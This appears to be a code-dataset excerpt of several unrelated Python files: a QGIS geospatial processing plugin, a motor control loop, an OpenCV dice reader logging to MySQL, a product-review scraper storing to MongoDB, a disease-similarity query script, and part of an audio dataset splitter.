przeciecia_fts.getFeatures():\n if intersection_geom.contains(przeciecia_ft.geometry()) or intersection_geom.intersects(przeciecia_ft.geometry()):\n nearestIds = spIndex.nearestNeighbor(przeciecia_ft.geometry(),1)\n przeciecia_km.append([])\n przeciecia_km[liczba_obszarow].append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n liczba_obszarow +=1\n else:\n # print('single')\n for przeciecia_ft in przeciecia_fts.getFeatures():\n if intersection.contains(przeciecia_ft.geometry()) or intersection.intersects(przeciecia_ft.geometry()):\n # print('zawiera')\n nearestIds = spIndex.nearestNeighbor(przeciecia_ft.geometry(),1)\n 
przeciecia_km[liczba_obszarow].append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n km_przeciec_obszaru = []\n\n for intersection_pt in intersection.asPolygon()[0]:\n\n nearestIds = spIndex.nearestNeighbor(intersection_pt,1)\n km_przeciec_obszaru.append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n przeciecia_km[liczba_obszarow].append(min(km_przeciec_obszaru))\n przeciecia_km[liczba_obszarow].append(max(km_przeciec_obszaru))\n\n else:\n\n for przeciecia_ft in przeciecia_fts.getFeatures():\n nearestIds = spIndex.nearestNeighbor(przeciecia_ft.geometry(),1)\n # przeciecia_km.append([])\n przeciecia_km[0].append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n # pt = feat.geometry().nearestPoint(obszar_ft.geometry())#.asPoint()\n # nearestIds = spIndex.nearestNeighbor(pt,1)#QgsGeometry.fromPointXY(pt),1)\n # przeciecia_km[0].append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n else:\n if km_checked and os_checked:\n nearestIds = spIndex.nearestNeighbor(feat.geometry(),1)\n przeciecia_km[0].append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n\n\n if km_checked and os_checked:\n i=1\n idx_km = self.layer.fields().lookupField('km')\n\n for przeciecie_km in przeciecia_km:\n if len(przeciecie_km)>0:\n przec_min = float(min(przeciecie_km))\n przec_max = float(max(przeciecie_km))\n przeciecie_km_str+= kmFormat(przec_min)\n if przec_min != przec_max:\n przeciecie_km_str+= ' - '\n przeciecie_km_str+= kmFormat(przec_max)\n elif len(przeciecia_km) == 1 and self.layer.fields().field(idx_km).type() != QVariant.String:\n przeciecie_km_str = przec_min\n if len(przeciecia_km) != i: przeciecie_km_str+= ', '\n i+=1\n\n # print(idx_km)\n # print(przeciecie_km_str)\n feat[idx_km] = str(przeciecie_km_str)\n\n if pas_checked:\n idx_czy_przecina = self.layer.fields().lookupField('czy_przecina')\n idx_dist_od_pasa = self.layer.fields().lookupField('dist_od_pasa')\n # print(idx_czy_przecina)\n # print(pos_zakres)\n feat[idx_czy_przecina] = pos_zakres\n feat[idx_dist_od_pasa] = min(dist_to_pas) if dist_to_pas else None # guard: min() of an empty list raises ValueError\n\n self.layer.updateFeature( feat )\n #############\n self.layer.commitChanges()\n
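\n# Editor's note (added example): a minimal, hedged sketch of the chainage-lookup\n# pattern used by przeciecia() above, assuming a QGIS 3 environment in which\n# QgsSpatialIndex is imported from qgis.core like the other Qgs classes used here;\n# the layer and field names are hypothetical.\ndef przyklad_nearest_km(point_layer, km_layer, km_field='km'):\n # build the spatial index over the kilometre markers once\n index = QgsSpatialIndex(km_layer.getFeatures())\n result = {}\n for feat in point_layer.getFeatures():\n # nearestNeighbor() returns candidate feature ids; read the chainage attribute from the match\n nearest_ids = index.nearestNeighbor(feat.geometry().centroid().asPoint(), 1)\n if nearest_ids:\n result[feat.id()] = km_layer.getFeature(nearest_ids[0])[km_field]\n return result\n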
\nclass LoadOuterLayers:\n def __init__(self):\n self.dsu = QgsDataSourceURI()\n pass\n # self.layers = []\n # self.licznik_warstw = 0\n # self.new_layers = []\n # self.sp_indexes = []\n # self.prefix = []\n\n def loadWFS(self):\n dsu = QgsDataSourceURI()\n dsu.setParam( 'url', 'http://wms.pcn.minambiente.it/ogc?map=/ms_ogc/wfs/Carta_geologica.map' )\n dsu.setParam( 'version', '1.1.0' )\n dsu.setParam( 'typename', 'GE.CARTAGEOLOGICA' )\n dsu.setParam( 'InvertAxisOrientation', '1' )\n layer = QgsVectorLayer( dsu.uri(), \"my wfs layer\", \"WFS\" )\n\n res = QgsVectorFileWriter.writeAsVectorFormat( layer,\n '/tmp/wfs_features.shp',\n 'System', # encoding\n None, #crs\n 'ESRI Shapefile')\n\n if res != QgsVectorFileWriter.NoError:\n print ('Error number:' + str(res)) # str() needed: res is an enum, not a string\n else:\n print (\"WFS saved!\")\n\n\nclass LoadLayers:\n def __init__(self):\n self.layers = []\n self.licznik_warstw = 0\n self.new_layers = []\n self.sp_indexes = []\n self.prefix = []\n self.context = QgsProcessingContext()\n\n def checkLayerValidity(self):\n wynik = 0\n layers_out = []\n for layer_klasa in self.layers:\n layer = layer_klasa.getLayer()\n print(layer)\n if layer is not None and layer.featureCount()>0 and layer.isValid() and layer.isSpatial():\n # iterate over the records and check for empty geometries; any empty geometry is an error\n for ft in layer.getFeatures():\n if ft.geometry().isNull():\n wynik = 1\n self.licznik_warstw+=1\n layers_out.append(Layer(layer))\n # if no valid layer was found at all, report it and stop\n if self.licznik_warstw==0:\n wynik = 2\n return wynik\n\n def getLayers(self):\n return self.layers\n\n def getLayersByPrefix(self, prefix):\n layer_by_prefix = None\n for layer_klasa in self.new_layers:\n\n if layer_klasa.getPrefix() == prefix:\n layer_by_prefix = layer_klasa\n return layer_by_prefix\n\n def getNewLayers(self):\n return self.new_layers\n\n def getPrefixes(self):\n return self.prefix\n\n def newLayers(self):\n return self.new_layers\n\n def loadLayer(self, layer, prefix):\n outputs = {}\n\n # Fix geometries (native:fixgeometries)\n print('layer: '+str(layer.source()))\n alg_params = {\n 'INPUT': layer.source(),\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['NaprawGeometrie'] = processing.run('native:fixgeometries', alg_params, context=self.context, is_child_algorithm=True)\n\n layer_napr = QgsProcessingUtils.mapLayerFromString(outputs['NaprawGeometrie']['OUTPUT'], self.context)\n layer_napr.setName(layer.name())\n\n layer_save = Layer(layer_napr)\n layer_save.makePrefix(prefix)\n self.layers.append(layer_save)\n self.prefix.append(prefix)\n\n def loadLayersFromStringList(self, layersStringList):\n self.layers = []\n for laer_orygin_str in layersStringList: # take the list of input files\n\n outputs = {}\n # Fix geometries\n alg_params = {\n 'INPUT': laer_orygin_str,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['NaprawGeometrie'] = processing.run('native:fixgeometries', alg_params, context=self.context, is_child_algorithm=True)\n\n #laer_orygin_str_napr = outputs['NaprawGeometrie']['OUTPUT']\n\n filename = ntpath.basename(laer_orygin_str) # extract the layer file name\n #layer = QgsVectorLayer(laer_orygin_str_napr, filename, \"ogr\") # create the layer\n\n layer = QgsProcessingUtils.mapLayerFromString(outputs['NaprawGeometrie']['OUTPUT'], self.context)\n layer.setName(filename)\n\n prefix = re.findall('\\A[a-zA-Z0-9]+_', filename)[0] if len(re.findall('\\A[a-zA-Z0-9]+_', filename))>0 else '_'\n layer_save = Layer(layer)\n layer_save.makePrefix(prefix)\n self.layers.append(layer_save)\n self.prefix.append(prefix)\n\n\n def makeNewLayers(self):\n self.new_layers = []\n crs92 = \"EPSG:2180\"\n for layer_orygin_klasa in self.layers:\n layer_orygin = layer_orygin_klasa.getLayer()\n # create a new layer into which the features of each source layer will be copied\n layer = QgsVectorLayer(QgsWkbTypes.displayString(layer_orygin.wkbType())+\"?crs=\"+crs92, layer_orygin.name(), \"memory\")\n\n attr = layer_orygin.dataProvider().fields().toList()\n layer.setProviderEncoding('UTF-8')\n layer.dataProvider().addAttributes(attr)\n\n layer.updateFields()\n\n # prepare the coordinate transformation\n crs_system = layer_orygin.sourceCrs() #QgsCoordinateReferenceSystem(crs)\n crs_system92 = QgsCoordinateReferenceSystem(crs92)\n xform = QgsCoordinateTransform(crs_system, crs_system92, QgsProject.instance())\n #CRS transformation\n feats = []\n\n for f in layer_orygin.getFeatures():\n g = f.geometry()\n g.transform(xform)\n f.setGeometry(g)\n feats.append(f)\n # add the features transformed to EPSG:2180 to the new layer in that CRS\n layer.dataProvider().addFeatures(feats)\n\n layer_save = Layer(layer)\n layer_save.setPrefix(layer_orygin_klasa.getPrefix())\n self.new_layers.append(layer_save)\n\n def addFields(self, km_checked, os_checked, pas_checked):\n # polygon check -------------\n for layer_klasa in self.new_layers:\n\n layer = layer_klasa.getLayer()\n # layer_orygin\n polygon = layer_klasa.czyPolygon()\n # take the attributes of the source layer\n attr = layer.dataProvider().fields().toList()\n # layer.dataProvider().addAttributes(attr)\n # layer.updateFields()\n\n field_names = layer.fields().names()\n field_names = [each_string.lower() for each_string in field_names]\n\n layer.startEditing() # start editing the layer\n\n # add the fields missing from the layer\n if 'id' not in field_names:\n field = QgsField( 'id', QVariant.String )\n layer.addAttribute( field )\n idx_id = layer.fields().lookupField('id') # get the column index so it can be filled in later\n\n if ('strona' not in field_names) and (km_checked and os_checked):\n field = QgsField( 'strona', QVariant.String )\n layer.addAttribute( field )\n idx_strona = layer.fields().lookupField('strona') # get the column index so it can be filled in later\n\n if ('km' not in field_names) and (km_checked and os_checked):\n field = QgsField( 'km', QVariant.String )\n layer.addAttribute( field )\n idx_km = layer.fields().lookupField('km')\n\n if ('dist_od_osi' not in field_names) and (km_checked and os_checked):\n field = QgsField( 'dist_od_osi', QVariant.String )\n layer.addAttribute( field )\n idx_dist_od_osi = layer.fields().lookupField('dist_od_osi')\n\n if ('dist_od_pasa' not in field_names) and pas_checked:\n field = QgsField( 'dist_od_pasa', QVariant.String )\n layer.addAttribute( field )\n idx_dist_od_pasa = layer.fields().lookupField('dist_od_pasa')\n\n if ('czy_przecina' not in field_names) and pas_checked:\n field = QgsField( 'czy_przecina', QVariant.String )\n layer.addAttribute( field )\n idx_czy_przecina = layer.fields().lookupField('czy_przecina')\n\n # fields only for polygons\n if polygon == True:\n if ('powierzchnia' not in field_names):\n field = QgsField( 'powierzchnia', QVariant.Double )\n layer.addAttribute( field )\n powierzchnia = layer.fields().lookupField('powierzchnia')\n\n if ('pow_prze' not in field_names) and pas_checked:\n field = QgsField( 'pow_prze', QVariant.Double )\n layer.addAttribute( field )\n powierzchnia_przec = layer.fields().lookupField('pow_prze')\n\n if ('procent' not in field_names) and pas_checked:\n field = QgsField( 'procent', QVariant.Double )\n layer.addAttribute( field )\n procent = layer.fields().lookupField('procent')\n\n id2=0\n for f in layer.getFeatures():\n id2+=1\n f[idx_id] = str(id2)\n layer.updateFeature( f )\n layer.commitChanges()\n\n\n\nclass ZlaczWarianty:\n def __init__(self, paths_and_prefix):\n self.prefix = []\n self.paths = []\n # self_warstwyzlaczone = []\n for pex in paths_and_prefix:\n self.prefix.append(pex[1])\n self.paths.append(pex[0])\n\n # print(self.prefix)\n # print(self.paths)\n\n self.output_path = QgsProcessing.TEMPORARY_OUTPUT\n\n self.results = {}\n self.outputs = {}\n\n\n def mergeLayers(self, output):\n path1 = None\n path2 = None\n # print(path1)\n # print(path2)\n i = 0\n context = QgsProcessingContext()\n for path in self.paths:\n i+=1\n # print(i)\n if i == len(self.paths):\n self.output_path = output\n if path1 is not None and path2 is not None:\n path2 = path\n path1 = self.outputs['ZczAtrybutyWedugWartociPola']['OUTPUT']\n if path2 is None and path1 is not None:\n path2 = path\n if path1 is None:\n path1 = path\n\n input1 = None\n if path1 is not None and path2 is not None:\n if i<3:\n wariant_fieldname = str(i-1) + 'wariant' # (the original concatenated a pointless empty string here)\n\n # Field calculator\n alg_params = {\n 'FIELD_LENGTH': 200,\n 'FIELD_NAME': wariant_fieldname,\n 'FIELD_PRECISION': 0,\n 'FIELD_TYPE': 2, # text\n 'FORMULA': \"'\" + self.prefix[i-2].replace('_','') + \"'\",\n 'INPUT': path1,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n self.outputs['KalkulatorPl1'] = processing.run('native:fieldcalculator', alg_params, context=context, is_child_algorithm=True)\n input1 = self.outputs['KalkulatorPl1']['OUTPUT']\n\n else:\n input1 = self.outputs['ZczAtrybutyWedugWartociPola']['OUTPUT']\n\n # Field calculator\n\n\n alg_params = {\n 'FIELD_LENGTH': 200,\n 'FIELD_NAME': wariant_fieldname,\n 'FIELD_PRECISION': 0,\n 'FIELD_TYPE': 2, # text\n 'FORMULA': \"'\" + self.prefix[i-1].replace('_','') + \"'\",\n 'INPUT': path2,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n self.outputs['KalkulatorPl2'] = processing.run('native:fieldcalculator', alg_params, context=context, is_child_algorithm=True)\n\n alg_params = {\n 'DISCARD_NONMATCHING': False,\n 'FIELD': 'id',\n 'FIELDS_TO_COPY': ['strona', 'km', 'dist_od_os', 'dist_od_pa', 'czy_przeci','powierzchn', 'pow_prze', 'procent', wariant_fieldname],\n 'FIELD_2': 'id',\n 'INPUT': input1,\n 'INPUT_2': self.outputs['KalkulatorPl2']['OUTPUT'],\n 'METHOD': 1, # take attributes only from the first matching feature (one-to-one)\n 'PREFIX': i,\n 'OUTPUT': self.output_path\n }\n # print( self.output_path)\n self.outputs['ZczAtrybutyWedugWartociPola'] = processing.run('native:joinattributestable', alg_params, context=context, is_child_algorithm=True)\n\n self.results['Wynik'] = self.outputs['ZczAtrybutyWedugWartociPola']['OUTPUT']\n\n return self.results['Wynik']\n\nclass ObrobkaWarstw:\n def __init__(self):\n self.prefix = []\n self.paths = []\n #self.conte\n\n def dodaj_atrybut_z_warstwy(self, layer_info, fieldname, layerpath, context = QgsProcessingContext()):\n # Field calculator\n outputs = {}\n\n # Reproject the layer to the target CRS\n alg_params = {\n 'INPUT': layer_info,\n 'OPERATION': '',\n 'TARGET_CRS': QgsCoordinateReferenceSystem('EPSG:2180'),\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['PrzeliczUkadWsprzdnychWarstwy'] = processing.runAndLoadResults('native:reprojectlayer', alg_params, context=context)\n\n alg_params = {\n 'FIELD_LENGTH': 255,\n 'FIELD_NAME': 'pole_dod',\n 'FIELD_PRECISION': 0,\n 'FIELD_TYPE': 2, # text\n 'FORMULA': ''' overlay_nearest( layer:=\\'{lay}\\', expression:=\\\"{fieldname}\\\")[0]'''.format(lay = outputs['PrzeliczUkadWsprzdnychWarstwy']['OUTPUT'], fieldname = fieldname),\n 'INPUT': layerpath,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n print(alg_params['FORMULA'])\n outputs['KalkulatorPl'] = processing.run('native:fieldcalculator', alg_params, context=context, is_child_algorithm=True)\n return [context, outputs['KalkulatorPl']['OUTPUT']]\n\n\nclass OcenyPlatow:\n def __init__(self):\n self.prefix = []\n self.paths = []\n #self.conte\n\n def licz_oceny(self, layerpath, context = QgsProcessingContext()):\n # Field calculator\n outputs = {}\n alg_params = {\n 'FIELD_LENGTH': 2,\n 'FIELD_NAME': 'ocena',\n 'FIELD_PRECISION': 0,\n 'FIELD_TYPE': 1, # integer\n 'FORMULA': '''case when 1=1 then case when \"stan\" like \\'%U1%\\' then case when \"procent\" = 0 then 0 else case when \"procent\" < 20 then -1 else case when \"procent\" < 50 then -2 else -3 end end end else case when \"stan\" like \\'%U2%\\' then case when \"procent\" = 0 then 0 else case when \"procent\" < 20 then -2 else -3 end end else case when \"procent\" = 0 then 0 else case when \"procent\" < 20 then -1 else case when \"procent\" < 50 then -2 else -3 end end end end end else case when 1=0 then case when \"stan\" like \\'%U1%\\' then case when \"procent\" < 20 then -1 else case when \"procent\" < 50 then -2 else -3 end end else case when \"stan\" like \\'%U2%\\' then case when \"procent\" < 20 then -2 else -3 end else case when \"procent\" < 20 then -1 else case when \"procent\" < 50 then -2 else -3 end end end end end end''',\n 'INPUT': layerpath,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['KalkulatorPl'] = processing.run('native:fieldcalculator', alg_params, context=context, is_child_algorithm=True)\n return [context, outputs['KalkulatorPl']['OUTPUT']]\n\n\n\n # print(self.prefix)\n # print(self.paths)","repo_name":"kamildrejer/oceny","sub_path":"oceny_core.py","file_name":"oceny_core.py","file_ext":"py","file_size_in_byte":32668,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"12259998281","text":"import time\nimport tmotorCAN\nimport numpy as np\nimport channel_config\nfrom matplotlib import pyplot as plt\n\nch0 = channel_config.start_channel()\n\nid_1 = 1\nid_2 = 2\n\n# Delta is how much the vertical is offset from the actual zero of the motor\ndelta_1 = 0\ndelta_2 = 0\n\n# Makes the motor come to the centre position\n\nt_in = 0\np_in = 0\n\ninit_time = time.time()\n\nmotor = tmotorCAN.tmotor(1, 'ak80-64')\n\nwhile True:\n\n current_time = time.time() - init_time\n p_out, v_out, t_out = motor.attain(delta_1 + p_in, 0, t_in, 50, 5)\n \n # Note: without load: A = 10, with load: A = 18\n A = 10\n \n t_in = A * np.sin(p_in)\n p_in = p_out \n","repo_name":"plutoincharm/me","sub_path":"gravity_compensation.py","file_name":"gravity_compensation.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"3354172157","text":"import datetime\r\nimport mysql.connector\r\nfrom getpass import getpass\r\nfrom mysql.connector import connect, Error\r\nimport cv2\r\nimport numpy as np\r\nfrom collections import deque\r\n \r\ntoday = datetime.datetime.today() # current date and time\r\nmin_threshold = 10 # these values are used to filter our blob detector.\r\nmax_threshold = 200 # they may need tuning depending on the distance to the camera, the camera angle, ...\r\nmin_area = 100 # ... focus, brightness, and so on.\r\nmin_circularity = 0.3\r\nmin_inertia_ratio = 0.5\r\n \r\ncap = cv2.VideoCapture(0) # '0' is the webcam id, usually 0/1/2/3/etc. \"cap\" is the video object.\r\ncap.set(15, -4) # '15' refers to the video exposure; '-4' sets it.
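# Editor's note (added comment): property id 15 is cv2.CAP_PROP_EXPOSURE, so the line\r\n# above is equivalent to cap.set(cv2.CAP_PROP_EXPOSURE, -4); the named constant would\r\n# be clearer. Whether the value is honoured is camera/driver specific.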
\r\n \r\ntemp=0\r\ncounter = 0 # the script uses a counter to process frames per second.\r\nreadings = deque([0, 0], maxlen=10) # deques are used to track the pip counts.\r\ndisplay = deque([0, 0], maxlen=10)\r\n \r\ntry:\r\n with connect(\r\n host=\"0.0.0.0\",\r\n user=input(\"Username: \"),\r\n password=getpass(\"Password: \"),\r\n database=\"randomizer\",\r\n ) as connection:\r\n print(connection)\r\nexcept Error as e:\r\n print(e)\r\n\r\nwhile True:\r\n ret, im = cap.read() # 'im' is a frame from the video.\r\n \r\n params = cv2.SimpleBlobDetector_Params() # declare the filter parameters.\r\n params.filterByArea = True\r\n params.filterByCircularity = True\r\n params.filterByInertia = True\r\n params.minThreshold = min_threshold\r\n params.maxThreshold = max_threshold\r\n params.minArea = min_area\r\n params.minCircularity = min_circularity\r\n params.minInertiaRatio = min_inertia_ratio\r\n \r\n detector = cv2.SimpleBlobDetector_create(params) # create the blob detector object.\r\n\r\n keypoints = detector.detect(im) # keypoints is a list containing the detected blobs.\r\n \r\n # draw the keypoints on the frame.\r\n im_with_keypoints = cv2.drawKeypoints(im, keypoints, np.array([]), (0, 0, 255),\r\n cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\r\n \r\n cv2.imshow(\"Dice Reader\", im_with_keypoints) # show the frame with the keypoints drawn.\r\n \r\n if counter % 10 == 0: # enter this block every 10 frames.\r\n reading = len(keypoints) # 'reading' counts the number of keypoints (pips).\r\n readings.append(reading) # record the reading from this frame.\r\n \r\n if readings[-1] == readings[-2] == readings[-3]: # if the last 3 readings match...\r\n display.append(readings[-1]) # ... then we have a reliable reading.
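# Editor's note (added comment): requiring three identical consecutive readings is a\r\n# simple debounce -- a die still in motion produces fluctuating blob counts, so a value\r\n# is only trusted once it is stable across three sampled frames. Both deques are\r\n# bounded (maxlen=10), so stale readings fall off automatically.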
\r\n \r\n # if the last valid value changed and is non-zero, print it.\r\n if display[-1] != display[-2] and display[-1] != 0:\r\n msg = f\"{display[-1]}\\n****\"\r\n print(msg)\r\n a=today.strftime(\"%d/%m/%Y\") \r\n b=today.strftime(\"%H.%M.%S\")\r\n # parameterised INSERT -- the original embedded the Python variable names\r\n # directly in the SQL string, which would insert nothing useful\r\n results = \"\"\"\r\n INSERT INTO results (№_генерации, Дата, Время, Результат)\r\n VALUES (%s, %s, %s, %s)\r\n \"\"\"\r\n temp+= 1\r\n counter += 1\r\n with connection.cursor() as cursor:\r\n cursor.execute(results, (temp, a, b, msg))\r\n connection.commit()\r\n \r\n if cv2.waitKey(1) & 0xff == 27: # press [Esc] to exit.\r\n break\r\n \r\ncv2.destroyAllWindows()\r\n\r\n","repo_name":"SemOr14/randomayzer","sub_path":"grjry.py","file_name":"grjry.py","file_ext":"py","file_size_in_byte":4587,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"3533388115","text":"from bs4 import BeautifulSoup as bs\nfrom selenium import webdriver\nimport pymongo\nfirefox_options = webdriver.FirefoxOptions()\nfirefox_options.add_argument('--no-sandbox')\nfirefox_options.add_argument('--headless')\nfirefox_options.add_argument('window-size=1920,1080')\nfirefox_options.add_argument('--disable-gpu')\ndriver = webdriver.Firefox(options=firefox_options)\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef nykaa_reviews():\n search_string = input(\"Enter the product name to be searched: \")\n input_product = search_string.replace(\" \",\"%20\") # obtaining the input_product\n reviews = []\n try:\n dbConn = pymongo.MongoClient(\"mongodb://localhost:27017/\") # opening a connection to Mongo\n db = dbConn.crawlerDB # connecting to the database called crawlerDB\n a = db[search_string].find() # searching the collection with the name same as the keyword\n\n if db[search_string].count_documents({}) > 0: # if a collection with the searched keyword exists and has records (cursor.count() was removed in PyMongo 4)\n for i in a:\n reviews.append(i)\n return reviews # show the results to the user\n else:\n nykaa_url = \"https://www.nykaa.com/search/result/?ptype=search&q=\" + input_product # preparing the URL to search the product on nykaa\n driver.get(nykaa_url) # using the gecko driver to get the html of the nykaa webpage\n driver.implicitly_wait(30)\n source = driver.page_source\n html = bs(source, \"html.parser\") # parsing the webpage as html\n bigboxes = html.findAll(\"div\", {\"class\": \"card-wrapper-container col-xs-12 col-sm-6 col-md-4\"}) # searching for the appropriate tag to redirect to the product link\n for i in bigboxes:\n if 'tip-tile' in i.div.div['class']: \n bigboxes.remove(i) # removing unnecessary boxes which include ads \n for box in bigboxes:\n productLink = \"https://www.nykaa.com\" + box.div.a['href'] # extracting the actual product link\n driver.get(productLink) # using the driver again to get the html of the specific product page\n driver.implicitly_wait(30)\n source = driver.page_source\n prod_html = bs(source, \"html.parser\") # parsing the product page as HTML\n prod_name = prod_html.find_all('h1', {'class': \"product-title\"}) # finding the product name\n prod_name = prod_name[0].text \n commentboxes = prod_html.find_all('div', {'class': \"col-md-12\"}) # finding the HTML section containing the customer comments\n del commentboxes[0:3] # deleting unnecessary leading boxes\n\n table = db[search_string] # creating a collection with the same name as the search string.\n for comment in commentboxes:\n try:\n name = comment.find_all('span', {'class': \"reviewer-name\"})[0].text # finding the reviewer name\n except:\n name = \"no name\"\n 
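# Editor's note (added comment): the rating and description below are read from\n # schema.org microdata -- <meta itemprop=\"...\"> tags embedded in the product\n # page -- which tends to be more stable across page redesigns than display markup.\n 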
try:\n header = comment.header.find_all('h4')[0].text # finding the comment heading\n except:\n header = \"no header\"\n try:\n rating = comment.find('meta',{'itemprop':'ratingValue'}) # finding the rating value given by the reviewer\n x = rating[\"content\"] if rating else None\n except:\n x = \"no rating\"\n try:\n review = comment.find('meta',{'itemprop': 'description'}) # finding the comment description\n description = review[\"content\"] if review else None\n except:\n description = \"no description\"\n mydict = {\"Product\": prod_name, \"Name\": name, \"Rating\": x, \"CommentHead\": header,\"Comment\": description} # combining all the information in a dictionary\n y = table.insert_one(mydict) # inserting the dictionary containing the review comment into the collection\n reviews.append(mydict) # appending the comment to the review list\n return reviews\n except BaseException as e:\n return 'something is wrong' \n \nnykaa_reviews() ","repo_name":"payal-28/Review-Scraper","sub_path":"scraper/nykaa_scraper.py","file_name":"nykaa_scraper.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"34637925193","text":"import engine\nimport math\nimport csv\nimport sys\nimport util\nimport defaultlist\nfrom urllib import parse, request\nimport hw2\n\n\ndef load_diseases():\n disease_list = list()\n with open('disease_list_final.txt') as f:\n lines = f.readlines()\n for l in lines:\n disease_list.append(l)\n return disease_list\n\n\ndisease_list = load_diseases()\ndisease_vector = util.load_final_vector()\nprint(disease_vector[0])\n\n\ndef lookup():\n '''q_to_eq[index of question] = equivalence class indices'''\n q_to_eq = []\n with open('quest.csv') as f:\n read = csv.reader(f, delimiter=',')\n for row in read:\n q_to_eq.append(row[0])\n f.close()\n return q_to_eq\n\n\ndef user_inp(inp):\n '''Converts the string command line argument into normalized weights'''\n inp_list = inp[1:-1].split(',') # Note all elements are STRINGs\n assert (len(inp_list)==29)\n norm_inp = []\n score4 = [0, 0.33333, 0.66666, 1] # scoring scale for 4 options\n score2 = [0, 1] # scoring scale for 2 options\n for n in range(25): # 25 questions with 4 options\n norm_inp.append(score4[int(inp_list[n])])\n for n in range(4):\n norm_inp.append(score2[int(inp_list[25 + n])])\n return norm_inp\n\n\ndef cosine_sim(x, y):\n '''\n Computes the cosine similarity between two dense vectors of equal length\n (the original docstring claimed sparse dictionaries, but lists are passed in).\n '''\n dot = 0\n for idx, num_x in enumerate(x):\n num_y = y[idx]\n dot += num_x*num_y\n sqrt_sum_x = 0\n sqrt_sum_y = 0\n for num_x in x:\n sqrt_sum_x += num_x**2\n for num_y in y:\n sqrt_sum_y += num_y**2\n # the original took sqrt of a single element inside the loop; the norms\n # must be the square roots of the summed squares\n norm_x = math.sqrt(sqrt_sum_x)\n norm_y = math.sqrt(sqrt_sum_y)\n sim = dot/(norm_x*norm_y + 1) # the '+ 1' guards against all-zero vectors\n return sim\n
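\n# Editor's note (added example): a small, hedged sanity check for the corrected\n# cosine_sim() above. The '+ 1' smoothing term in the denominator (kept from the\n# original) means even identical vectors score slightly below 1.0.\ndef _cosine_sim_example():\n a = [1.0, 2.0, 3.0]\n print(cosine_sim(a, a)) # close to, but below, 1.0 because of the '+ 1' term\n print(cosine_sim([1.0, 0.0], [0.0, 1.0])) # orthogonal vectors -> 0.0\n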
\n\ndef main():\n if len(sys.argv) == 1:\n raise Exception('Missing command line argument (user input). Exiting.')\n inp_arr = sys.argv[1]\n q_eq = lookup() # lookup table\n norm_inp = user_inp(inp_arr)\n res = [0] * 127 # one accumulator slot per equivalence class (the original built this as [x-x for x in range(127)])\n # n = question number\n # q_eq[n] = [equivalence classes corresponding to q n]\n for n in range(29):\n q_eq[n] = q_eq[n].split(',')\n for eq in q_eq[n]: # each eq class corresponding to q n\n if (eq.rstrip() !=''):\n res[int(eq)] += norm_inp[n]\n similarity = list()\n for idx, v in enumerate(disease_vector):\n similarity.append(cosine_sim(v, res))\n val, idx = max((val, idx) for (idx, val) in enumerate(similarity))\n disease_name = disease_list[idx]\n print(disease_name)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DiliSimon/HopHacks19","sub_path":"query_engine.py","file_name":"query_engine.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"23847781225","text":"import os\nimport argparse\nimport json\nimport glob\nimport pandas as pd\nfrom tqdm import tqdm\nfrom more_itertools import pairwise\nfrom pydub import AudioSegment\nfrom pydub.effects import normalize\n\nDATASET_FOLDER = \"data/datasets/ChihuahuaDoTrump\"\nBIT_RATE = \"32k\"\nTARGET_SAMPLE_RATE = 22050\n\n\ndef fix_durations(subtitles_list):\n \"\"\"Fix the durations in the subtitles json\n\n Args:\n subtitles_list: List of dictionaries with subtitle info\n\n Returns:\n [list(dict)]: Fixed list of dictionaries\n \"\"\"\n for s1, s2 in pairwise(subtitles_list):\n s1['dur'] = str(float(s2['start']) - float(s1['start']))\n return subtitles_list\n\n\ndef split_fragments(text_file, audio_file, data_out, init_uid):\n \"\"\"Create the phrase/transcription pairs in the dataset format\n from the given audio/text files\n\n Args:\n text_file (str): Path to text file\n audio_file (str): Path to audio file\n data_out (str): Path to dataset output\n init_uid (int): Initial value for unique identifier\n\n Returns:\n metadata: Dataframe with all info of the dataset\n uid (int): Last used unique identifier\n \"\"\"\n # Load subtitle\n text = json.load(open(text_file, encoding='utf8'))\n fixed_text = fix_durations(text['original'])\n\n # Load sound\n sound = AudioSegment.from_file(audio_file)\n transcriptions = []\n ids = []\n uid = init_uid\n # Splitting by text sentence\n for sentence in fixed_text:\n # silence = AudioSegment.silent(duration=100)\n start = int(float(sentence['start']) * 1000) - 300\n end = int(float(sentence['start']) * 1000 +\n float(sentence['dur']) * 1000)\n # normalize the fragment (the 100 ms silence padding above is left disabled; the start is shifted 300 ms earlier instead)\n fragment = normalize(sound[start:end])\n # Check audio length\n if (fragment.duration_seconds > 20) or (fragment.duration_seconds < .4):\n continue\n uid += 1\n str_id = \"{:0>6}\".format(uid)\n ids.append(str_id)\n transcriptions.append(sentence['text'])\n # Frame rate\n fragment = fragment.set_frame_rate(TARGET_SAMPLE_RATE).set_channels(1)\n fragment.export(os.path.join(data_out, \"wav\", str_id + \".wav\"),\n format=\"wav\", bitrate=BIT_RATE)\n\n # Create dataset\n metadata = pd.DataFrame(columns=[\"id\", \"transcription\"])\n metadata[\"id\"] = ids\n 